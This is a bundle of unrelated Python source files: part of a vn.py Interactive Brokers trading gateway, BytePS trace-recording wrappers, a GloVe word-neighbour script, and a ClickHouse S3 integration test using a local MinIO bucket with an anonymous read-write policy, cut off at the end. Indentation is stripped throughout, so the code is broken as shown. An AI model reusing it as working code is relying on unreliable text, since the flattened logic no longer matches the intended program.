exchange=EXCHANGE_IB2VT[ib_contract.exchange],
name=contractDetails.longName,
product=PRODUCT_IB2VT[ib_contract.secType],
size=int(ib_contract.multiplier),
pricetick=contractDetails.minTick,
net_position=True,
history_data=True,
stop_supported=True,
gateway_name=self.gateway_name,
)
if contract.vt_symbol not in self.contracts:
self.gateway.on_contract(contract)
self.contracts[contract.vt_symbol] = contract
self.save_contract_data()
def execDetails(
self, reqId: int, contract: Contract, execution: Execution
) -> None:
"""交易数据更新回报"""
super().execDetails(reqId, contract, execution)
dt: datetime = datetime.strptime(execution.time, "%Y%m%d %H:%M:%S")
dt: datetime = self.local_tz.localize(dt)
trade: TradeData = TradeData(
symbol=generate_symbol(contract),
exchange=EXCHANGE_IB2VT.get(contract.exchange, Exchange.SMART),
orderid=str(execution.orderId),
tradeid=str(execution.execId),
direction=DIRECTION_IB2VT[execution.side],
price=execution.price,
volume=execution.shares,
datetime=dt,
gateway_name=self.gateway_name,
)
self.gateway.on_trade(trade)
def managedAccounts(self, accountsList: str) -> None:
"""所有子账户回报"""
super().managedAccounts(accountsList)
if not self.account:
for account_code in accountsList.split(","):
self.account = account_code
self.gateway.write_log(f"当前使用的交易账号为{self.account}")
self.client.reqAccountUpdates(True, self.account)
def historicalData(self, reqId: int, ib_bar: IbBarData) -> None:
"""历史数据更新回报"""
# Daily and weekly bars use the %Y%m%d date format (no time component)
if len(ib_bar.date) > 8:
dt: datetime = datetime.strptime(ib_bar.date, "%Y%m%d %H:%M:%S")
else:
dt: datetime = datetime.strptime(ib_bar.date, "%Y%m%d")
dt: datetime = self.local_tz.localize(dt)
bar: BarData = BarData(
symbol=self.history_req.symbol,
exchange=self.history_req.exchange,
datetime=dt,
interval=self.history_req.interval,
volume=ib_bar.volume,
open_price=ib_bar.open,
high_price=ib_bar.high,
low_price=ib_bar.low,
close_price=ib_bar.close,
gateway_name=self.gateway_name
)
self.history_buf.append(bar)
def historicalDataEnd(self, reqId: int, start: str, end: str) -> None:
"""历史数据查询完毕回报"""
self.history_condition.acquire()
self.history_condition.notify()
self.history_condition.release()
def connect(self, host: str, port: int, clientid: int, account: str) -> None:
"""连接TWS"""
if self.status:
return
self.host = host
self.port = port
self.clientid = clientid
self.account = account
self.client.connect(host, port, clientid)
self.thread = Thread(target=self.client.run)
self.thread.start()
def check_connection(self) -> None:
"""检查连接"""
if self.client.isConnected():
return
if self.status:
self.close()
self.client.connect(self.host, self.port, self.clientid)
self.thread = Thread(target=self.client.run)
self.thread.start()
def close(self) -> None:
"""断开TWS连接"""
if not self.status:
return
self.status = False
self.client.disconnect()
def subscribe(self, req: SubscribeRequest) -> None:
"""订阅tick数据更新"""
if not self.status:
return
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"不支持的交易所{req.exchange}")
return
# Filter out duplicate subscriptions
if req.vt_symbol in self.subscribed:
return
self.subscribed[req.vt_symbol] = req
# Parse the IB contract details
ib_contract: Contract = generate_ib_contract(req.symbol, req.exchange)
if not ib_contract:
self.gateway.write_log("代码解析失败,请检查格式是否正确")
return
# Query contract information through TWS
self.reqid += 1
self.client.reqContractDetails(self.reqid, ib_contract)
# Subscribe to tick data and create a tick buffer object
self.reqid += 1
self.client.reqMktData(self.reqid, ib_contract, "", False, False, [])
tick: TickData = TickData(
symbol=req.symbol,
exchange=req.exchange,
datetime=datetime.now(self.local_tz),
gateway_name=self.gateway_name,
)
self.ticks[self.reqid] = tick
self.tick_exchange[self.reqid] = req.exchange
def send_order(self, req: OrderRequest) -> str:
"""委托下单"""
if not self.status:
return ""
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"不支持的交易所:{req.exchange}")
return ""
if req.type not in ORDERTYPE_VT2IB:
self.gateway.write_log(f"不支持的价格类型:{req.type}")
return ""
self.orderid += 1
ib_contract: Contract = generate_ib_contract(req.symbol, req.exchange)
if not ib_contract:
return ""
ib_order: Order = Order()
ib_order.orderId = self.orderid
ib_order.clientId = self.clientid
ib_order.action = DIRECTION_VT2IB[req.direction]
ib_order.orderType = ORDERTYPE_VT2IB[req.type]
ib_order.totalQuantity = req.volume
ib_order.account = self.account
if req.type == OrderType.LIMIT:
ib_order.lmtPrice = req.price
elif req.type == OrderType.STOP:
ib_order.auxPrice = req.price
self.client.placeOrder(self.orderid, ib_contract, ib_order)
self.client.reqIds(1)
order: OrderData = req.create_order_data(str(self.orderid), self.gateway_name)
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest) -> None:
"""委托撤单"""
if not self.status:
return
self.client.cancelOrder(int(req.orderid))
def query_history(self, req: HistoryRequest) -> List[BarData]:
"""查询历史数据"""
self.history_req = req
self.reqid += 1
ib_contract: Contract = generate_ib_contract(req.symbol, req.exchange)
if req.end:
end: datetime = req.end
end_str: str = end.strftime("%Y%m%d %H:%M:%S")
else:
end: datetime = datetime.now(self.local_tz)
end_str: str = ""
delta: timedelta = end - req.start
days: int = min(delta.days, 180)  # IB only provides 6 months of data
duration: str = f"{days} D"
bar_size: str = INTERVAL_VT2IB[req.interval]
if req.exchange == Exchange.IDEALPRO:
bar_type: str = "MIDPOINT"
else:
bar_type: str = "TRADES"
self.history_reqid = self.reqid
self.client.reqHistoricalData(
self.reqid,
ib_contract,
end_str,
duration,
bar_size,
bar_type,
0,
1,
False,
[]
)
self.history_condition.acquire()  # wait for the asynchronous data to arrive
self.history_condition.wait()
self.history_condition.release()
history: List[BarData] = self.history_buf
self.history_buf: List[BarData] = []  # create a new buffer list
self.history_req: HistoryRequest = None
return history
def load_contract_data(self) -> None:
"""加载本地合约数据"""
f = shelve.open(self.data_filepath)
self.contracts = f.get("contracts", {})
f.close()
for contract in self.contracts.values():
self.gateway.on_contract(contract)
self.gateway.write_log("本地缓存合约信息加载成功")
def save_contract_data(self) -> None:
"""保存合约数据至本地"""
f = shelve.open(self.data_filepath)
f["contracts"] = self.contracts
f.close()
def generate_ib_contract(symbol: str, exchange: Exchange) -> Optional[Contract]:
"""生产IB合约"""
try:
fields: list = symbol.split(JOIN_SYMBOL)
ib_contract: Contract = Contract()
ib_contract.exchange = EXCHANGE_VT2IB[exchange]
ib_contract.secType = fields[-1]
ib_contract.currency = fields[-2]
ib_contract.symbol = fields[0]
if ib_contract.secType in ["FUT", "OPT", "FOP"]:
ib_contract.lastTradeDateOrContractMonth = fields[1]
if ib_contract.secType == "FUT":
if len(fields) == 5:
ib_contract.multiplier = int(fields[2])
if ib_contract.secType in ["OPT", "FOP"]:
ib_contract.right = fields[2]
ib_contract.strike = float(fields[3])
ib_contract.multiplier = int(fields[4])
except IndexError:
ib_contract = None
return ib_contract
def generate_symbol(ib_contract: Contract) -> str:
"""生成vnpy代码"""
fields: list = [ib_contract.symbol]
if ib_contract.secType in ["FUT", "OPT", "FOP"]:
fields.append(ib_contract.lastTradeDateOrContractMonth)
if ib_contract.secType in ["OPT", "FOP"]:
fields.append(ib_contract.right)
fields.append(str(ib_contract.strike))
fields.append(str(ib_contract.multiplier))
fields.append(ib_contract.currency)
fields.append(ib_contract.secType)
symbol: str = JOIN_SYMBOL.join(fields)
return symbol
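# --- hedged sketch (not part of the original gateway) ---
# Round trip of the symbol rules documented in the module docstring:
# generate_ib_contract() parses a vn.py symbol string into an ibapi Contract,
# and generate_symbol() rebuilds the string from that Contract. The two
# samples below come from the module docstring, paired with the exchanges
# listed there.
def _symbol_round_trip_demo() -> None:
    samples = [
        ("SPY-USD-STK", Exchange.SMART),
        ("ES-202002-USD-FUT", Exchange.GLOBEX),
    ]
    for symbol, exchange in samples:
        contract = generate_ib_contract(symbol, exchange)
        assert contract is not None and generate_symbol(contract) == symbol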
|
dataloader.py
|
import os
import time
import json
import threading
from horovod.mxnet.mpi_ops import local_rank
class TimtLineRecorder(object):
def __init__(self, _trace_name, _name):
if os.environ.get("BYTEPS_TRACE_ON", "") == "1":
self._end_trace = True
self._end_trace = False
self.trace_dir = os.path.join(os.environ.get("BYTEPS_TRACE_DIR", "."), str(local_rank()))
if not os.path.exists(self.trace_dir):
os.makedirs(self.trace_dir)
self.trace_path = os.path.join(self.trace_dir, _trace_name)
self.ts = []
self.dur = []
self._name = _name
def start(self):
if self._end_trace:
return
if os.environ.get("BYTEPS_TRACE_STATUS", "") == "END":
self._end_trace = True
self.output_traces()
return
self.ts.append(time.time() * 1000000.0)
def end(self):
if self._end_trace:
return
assert len(self.ts) == len(self.dur) + 1 or len(self.ts) == len(self.dur)
if len(self.ts) == len(self.dur) + 1:
self.dur.append(time.time() * 1000000.0 - self.ts[-1])
def output_traces(self):
def _output(self):
rst_traces = {"traceEvents": []}
for i in range(len(self.dur)):
_ts, _dur = self.ts[i], self.dur[i]
_event = {
"name": self._name,
"ts": _ts,
"dur": _dur,
"ph": "X",
"cat": self._name,
"pid": self._name,
"args": {
"name":self._name
}
}
rst_traces["traceEvents"].append(_event)
rst_traces["displayTimeUnit"] = "ms"
with open(self.trace_path, 'w') as f:
json.dump(rst_traces, f, indent=4)
self.ts = []
self.dur = []
t = threading.Thread(target=_output, args=(self,))
t.start()
########################################################
# Used to wrap IO iterator
########################################################
class HVDMultiWorkerIter(object):
def __init__(self, data_iter):
self._data_iter = data_iter
self.recorder = TimtLineRecorder('io.json', 'I/O')
def _push_next_dataset(self):
self._data_iter._push_next_dataset()
def _push_next(self):
self._data_iter._push_next()
def _next_dataset(self):
return self._data_iter._next_dataset()
def __next__(self):
self.recorder.start()
ret = self._data_iter.__next__()
self.recorder.end()
return ret
def next(self):
return self.__next__()
def __iter__(self):
return self
def __len__(self):
return self._data_iter.__len__()
class HVDDatasetLoader(object):
def __init__(self, dataloader):
self._dataloader = dataloader
def __iter__(self):
return HVDMultiWorkerIter(self._dataloader.__iter__())
def __len__(self):
return self._dataloader.__len__()
########################################################
# Trainer, used to wrap the process
# of updating local model
########################################################
class HVDTrainer(object):
def __init__(self, _trainer):
self._trainer = _trainer
self.recorder = TimtLineRecorder('step.json', 'STEP')
def backward(self, *args, **kwargs):
self._trainer.backward(*args, **kwargs)
def step(self, *args, **kwargs):
self.recorder.start()
self._trainer.step(*args, **kwargs)
self.recorder.end()
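# --- hedged sketch (not part of the original wrappers) ---
# TimtLineRecorder only records when BYTEPS_TRACE_ON=1 and it flushes its
# events to <BYTEPS_TRACE_DIR>/<local_rank>/<trace_name> once it sees
# BYTEPS_TRACE_STATUS=END. The demo below assumes Horovod has already been
# initialized (the recorder queries local_rank() in its constructor); the
# sleep stands in for the region being traced.
def timed_region_demo(iterations=3):
    recorder = TimtLineRecorder('demo.json', 'DEMO')
    for _ in range(iterations):
        recorder.start()
        time.sleep(0.01)  # placeholder for real work
        recorder.end()
    return recorder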
|
neighbors.py
|
"""Author: Brandon Trabucco
Calculate the closest neighbors of each word in embedding space.
"""
import numpy as np
import os.path
import collections
import nltk
import threading
import glove
def word_neighbors(vocab, embeddings, words, k=5):
"""Compute the k closest neighbors to the word ids in embedding space.
Args:
vocab: The vocabulary object.
embeddings: The embedding matrix.
words: List of words to evaluate.
Returns:
outputs: The k closest words to words
"""
output_ids, output_distances = compute_neighbors(
embeddings, [vocab.word_to_id(str(w).strip().lower()) for w in words], k=k)
return [[vocab.id_to_word(idx) for idx in x] for x in output_ids]
def compute_neighbors(embeddings, word_ids, k=5):
"""Compute the k closest neighbors to the word ids in embedding space.
Args:
embeddings: The embedding matrix.
word_ids: The word ids to evaluate the neighbors of.
Returns:
output_ids: The k closest words to word_ids
output_distances: Distances corresponding to output_ids.
"""
output_ids = []
output_distances = []
for idx in word_ids:
embedded = embeddings[idx:(idx + 1), :]
distances = np.linalg.norm(embeddings - embedded, axis=1)
closest = np.argsort(distances)[:k]
distances = distances[closest]
output_ids.append(closest)
output_distances.append(distances)
return output_ids, output_distances
def _compute_neighbors(thread_index, ranges, embeddings,
neighbor_ids, neighbor_distances):
"""Computes the k closest words to a set fo words in embedding space.
Args:
thread_index: int
ranges: Bounds of word ids to compute
embeddings: The embedding matrix
neighbor_ids: The word ids of the k closest neighbors.
neighbor_distances: The distances corresponding to neighbor_ids
"""
length = ranges[thread_index][1] - ranges[thread_index][0]
print("Starting thread %d with %d words." % (thread_index, length))
for idx in range(*ranges[thread_index]):
embedded = embeddings[idx:(idx + 1), :]
distances = np.linalg.norm(embeddings - embedded, axis=1)
closest = np.argsort(distances)[:neighbor_ids.shape[1]]
distances = distances[closest]
neighbor_ids[idx, :] = closest
neighbor_distances[idx, :] = distances
if (idx - ranges[thread_index][0]) % max(1, length // 10) == 0:
print("Thread %d processed %d words of %d." % (
thread_index, idx - ranges[thread_index][0], length))
print("Thread %d has finished." % thread_index)
def dump(config):
"""Loads word embeddngs an calculates neighbors.
Args:
config: an instance of NeighborConfiguration
"""
vocab, embeddings = glove.load(config)
num_threads = min(config.length, config.distances_threads)
spacing = np.linspace(0, config.length, num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
neighbor_ids = np.zeros([config.length, config.radius]).astype(np.int)
neighbor_distances = np.zeros([config.length, config.radius])
print("Launching %d threads for calculating neighbors." % (num_threads + 1))
for thread_index in range(len(ranges)):
args = (thread_index, ranges, embeddings, neighbor_ids, neighbor_distances)
t = threading.Thread(target=_compute_neighbors, args=args)
t.start()
threads.append(t)
for t in threads:
t.join()
ids_name = os.path.join(config.distances_dir, "neighbor.%s.%s.%s.ids.txt" % (
str(config.embedding) + "d", str(config.length) + "w", str(config.radius) + "k"))
distances_name = os.path.join(config.distances_dir, "neighbor.%s.%s.%s.distances.txt" % (
str(config.embedding) + "d", str(config.length) + "w", str(config.radius) + "k"))
np.savetxt(ids_name, neighbor_ids)
np.savetxt(distances_name, neighbor_distances)
print("Finished saving %s and %s." % (ids_name, distances_name))
def dump_default():
"""Loads the default word embeddings to compute neighbors of words.
"""
config = glove.configuration.NeighborConfiguration(
embedding=50,
filedir="./embeddings/",
length=12000,
start_word="<S>",
end_word="</S>",
unk_word="<UNK>",
radius=20,
distances_dir="./distances/",
distances_threads=7)
return dump(config)
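# --- hedged sketch (not part of the original module) ---
# compute_neighbors() only needs a (vocab_size, embedding_dim) matrix, so it
# can be smoke-tested without loading GloVe vectors. The matrix size below is
# arbitrary; the closest neighbor of every word should be the word itself,
# at distance zero.
def _smoke_test_compute_neighbors():
    rng = np.random.RandomState(0)
    embeddings = rng.randn(100, 16)
    ids, distances = compute_neighbors(embeddings, [0, 1, 2], k=3)
    assert all(row[0] == wid for row, wid in zip(ids, [0, 1, 2]))
    assert all(dist[0] == 0.0 for dist in distances)
    return ids, distances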
|
test.py
|
import gzip
import json
import logging
import os
import io
import random
import threading
import time
import helpers.client
import pytest
from helpers.cluster import ClickHouseCluster, ClickHouseInstance
MINIO_INTERNAL_PORT = 9001
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_PATH = os.path.join(SCRIPT_DIR, './_instances/dummy/configs/config.d/defaultS3.xml')
# Creates S3 bucket for tests and allows anonymous read-write access to it.
def prepare_s3_bucket(started_cluster):
# Allows read-write access for bucket without authorization.
bucket_read_write_policy = {"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::root/*"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::root/*"
}
]}
minio_client = started_cluster.minio_client
minio_client.set_bucket_policy(started_cluster.minio_bucket, json.dumps(bucket_read_write_policy))
started_cluster.minio_restricted_bucket = "{}-with-auth".format(started_cluster.minio_bucket)
if minio_client.bucket_exists(started_cluster.minio_restricted_bucket):
minio_client.remove_bucket(started_cluster.minio_restricted_bucket)
minio_client.make_bucket(started_cluster.minio_restricted_bucket)
def put_s3_file_content(started_cluster, bucket, filename, data):
buf = io.BytesIO(data)
started_cluster.minio_client.put_object(bucket, filename, buf, len(data))
# Returns content of given S3 file as string.
def get_s3_file_content(started_cluster, bucket, filename, decode=True):
# type: (ClickHouseCluster, str, str, bool) -> str
data = started_cluster.minio_client.get_object(bucket, filename)
data_str = b""
for chunk in data.stream():
data_str += chunk
if decode:
return data_str.decode()
return data_str
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("restricted_dummy", main_configs=["configs/config_for_test_remote_host_filter.xml"],
with_minio=True)
cluster.add_instance("dummy", with_minio=True, main_configs=["configs/defaultS3.xml"])
cluster.add_instance("s3_max_redirects", with_minio=True, main_configs=["configs/defaultS3.xml"],
user_configs=["configs/s3_max_redirects.xml"])
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
prepare_s3_bucket(cluster)
logging.info("S3 bucket created")
run_s3_mocks(cluster)
yield cluster
finally:
cluster.shutdown()
def run_query(instance, query, stdin=None, settings=None):
# type: (ClickHouseInstance, str, object, dict) -> str
logging.info("Running query '{}'...".format(query))
result = instance.query(query, stdin=stdin, settings=settings)
logging.info("Query finished")
return result
# Test simple put. Also checks that wrong credentials produce an error with every compression method.
@pytest.mark.parametrize("maybe_auth,positive,compression", [
pytest.param("", True, 'auto', id="positive"),
pytest.param("'minio','minio123',", True, 'auto', id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, 'auto', id="auto"),
pytest.param("'wrongid','wrongkey',", False, 'gzip', id="gzip"),
pytest.param("'wrongid','wrongkey',", False, 'deflate', id="deflate"),
pytest.param("'wrongid','wrongkey',", False, 'brotli', id="brotli"),
pytest.param("'wrongid','wrongkey',", False, 'xz', id="xz"),
pytest.param("'wrongid','wrongkey',", False, 'zstd', id="zstd")
])
def test_put(started_cluster, maybe_auth, positive, compression):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test.csv"
put_query = f"""insert into table function s3('http://{started_cluster.minio_ip}:{started_cluster.minio_port}/{bucket}/{filename}',
{maybe_auth}'CSV', '{table_format}', {compression}) values {values}"""
try:
run_query(instance, put_query)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
@pytest.mark.parametrize("special", [
"space",
"plus"
])
def test_get_file_with_special(started_cluster, special):
symbol = {"space": " ", "plus": "+"}[special]
urlsafe_symbol = {"space": "%20", "plus": "%2B"}[special]
auth = "'minio','minio123',"
bucket = started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = [[12549, 2463, 19893], [64021, 38652, 66703], [81611, 39650, 83516], [11079, 59507, 61546], [51764, 69952, 6876], [41165, 90293, 29095], [40167, 78432, 48309], [81629, 81327, 11855], [55852, 21643, 98507], [6738, 54643, 41155]]
values_csv = ('\n'.join((','.join(map(str, row)) for row in values)) + '\n').encode()
filename = f"get_file_with_{special}_{symbol}two.csv"
put_s3_file_content(started_cluster, bucket, filename, values_csv)
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}two.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
@pytest.mark.parametrize("special", [
"space",
"plus",
"plus2"
])
def test_get_path_with_special(started_cluster, special):
symbol = {"space": "%20", "plus": "%2B", "plus2": "%2B"}[special]
safe_symbol = {"space": "%20", "plus": "+", "plus2": "%2B"}[special]
auth = "'minio','minio123',"
table_format = "column1 String"
instance = started_cluster.instances["dummy"]
get_query = f"SELECT * FROM s3('http://resolver:8082/get-my-path/{safe_symbol}.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert run_query(instance, get_query).splitlines() == [f"/{symbol}.csv"]
# Test putting no data to S3.
@pytest.mark.parametrize("auth", [
pytest.param("'minio','minio123',", id="minio")
])
def test_empty_put(started_cluster, auth):
# type: (ClickHouseCluster, str) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
create_empty_table_query = """
CREATE TABLE empty_table (
{}
) ENGINE = Null()
""".format(table_format)
run_query(instance, create_empty_table_query)
filename = "empty_put_test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') select * from empty_table".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format)
run_query(instance, put_query)
try:
run_query(instance, "select count(*) from s3('http://{}:{}/{}/{}', {}'CSV', '{}')".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format))
assert False, "Query should be failed."
except helpers.client.QueryRuntimeException as e:
        assert str(e).find("The specified key does not exist") != -1
# Test inserting values in CSV format.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'minio','minio123',", True, id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, id="negative"),
])
def test_put_csv(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster, bool, str) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, maybe_auth, table_format)
csv_data = "8,9,16\n11,18,13\n22,14,2\n"
try:
run_query(instance, put_query, stdin=csv_data)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
# Test put and get with S3 server redirect.
def test_put_get_with_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
values_csv = "1,1,1\n1,1,1\n11,11,11\n"
filename = "test.csv"
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
run_query(instance, query)
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/{}', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format)
stdout = run_query(instance, query)
assert list(map(str.split, stdout.splitlines())) == [
["1", "1", "1", "1"],
["1", "1", "1", "1"],
["11", "11", "11", "1331"],
]
# Test put with restricted S3 server redirect.
def test_put_with_zero_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["s3_max_redirects"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
filename = "test.csv"
# Should work without redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, table_format, values)
run_query(instance, query)
# Should not work with redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
exception_raised = False
try:
run_query(instance, query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
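# Test writing 100 small files into per-directory keys and reading them back with
# glob patterns, checking the column sums and the _file/_path virtual columns.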
def test_put_get_with_globs(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
for i in range(10):
for j in range(10):
path = "{}_{}/{}.csv".format(i, random.choice(['a', 'b', 'c', 'd']), j)
max_path = max(path, max_path)
values = "({},{},{})".format(i, j, i + j)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
query = "select sum(column1), sum(column2), sum(column3), min(_file), max(_path) from s3('http://{}:{}/{}/*_{{a,b,c,d}}/%3f.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == [
"450\t450\t900\t0.csv\t{bucket}/{max_path}".format(bucket=bucket, max_path=max_path)]
# Test multipart put.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'wrongid','wrongkey'", False, id="negative"),
# ("'minio','minio123',",True), Redirect with credentials not working with nginx.
])
def test_multipart_put(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
# Minimum size of part is 5 Mb for Minio.
# See: https://github.com/minio/minio/blob/master/docs/minio-limits.md
min_part_size_bytes = 5 * 1024 * 1024
csv_size_bytes = int(min_part_size_bytes * 1.5) # To have 2 parts.
one_line_length = 6 # 3 digits, 2 commas, 1 line separator.
# Generate data having size more than one part
int_data = [[1, 2, 3] for i in range(csv_size_bytes // one_line_length)]
csv_data = "".join(["{},{},{}\n".format(x, y, z) for x, y, z in int_data])
assert len(csv_data) > min_part_size_bytes
filename = "test_multipart.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, maybe_auth, table_format)
try:
run_query(instance, put_query, stdin=csv_data, settings={'s3_min_upload_part_size': min_part_size_bytes,
's3_max_single_part_upload_size': 0})
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
# Use proxy access logs to count number of parts uploaded to Minio.
proxy_logs = started_cluster.get_container_logs("proxy1") # type: str
assert proxy_logs.count("PUT /{}/{}".format(bucket, filename)) >= 2
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
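# Test that the remote host filter in config.xml rejects both SELECT and INSERT
# queries against a host that is not allowed.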
def test_remote_host_filter(started_cluster):
instance = started_cluster.instances["restricted_dummy"]
format = "column1 UInt32, column2 UInt32, column3 UInt32"
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/test.csv', 'CSV', '{}')".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
other_values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
query = "insert into table function s3('http://{}:{}/{}/test.csv', 'CSV', '{}') values {}".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format, other_values)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
@pytest.mark.parametrize("s3_storage_args", [
pytest.param("''", id="1_argument"),
pytest.param("'','','','','',''", id="6_arguments"),
])
def test_wrong_s3_syntax(started_cluster, s3_storage_args):
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
expected_err_msg = "Code: 42" # NUMBER_OF_ARGUMENTS_DOESNT_MATCH
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3({})".format(s3_storage_args)
assert expected_err_msg in instance.query_and_get_error(query)
# https://en.wikipedia.org/wiki/One_Thousand_and_One_Nights
def test_s3_glob_scheherazade(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
values = "(1, 1, 1)"
nights_per_job = 1001 // 30
jobs = []
for night in range(0, 1001, nights_per_job):
def add_tales(start, end):
for i in range(start, end):
path = "night_{}/tale.csv".format(i)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
jobs.append(threading.Thread(target=add_tales, args=(night, min(night + nights_per_job, 1001))))
jobs[-1].start()
for job in jobs:
job.join()
query = "select count(), sum(column1), sum(column2), sum(column3) from s3('http://{}:{}/{}/night_*/tale.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["1001\t1001\t1001\t1001"]
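# Copy the mock S3 servers into the "resolver" container, start them in the
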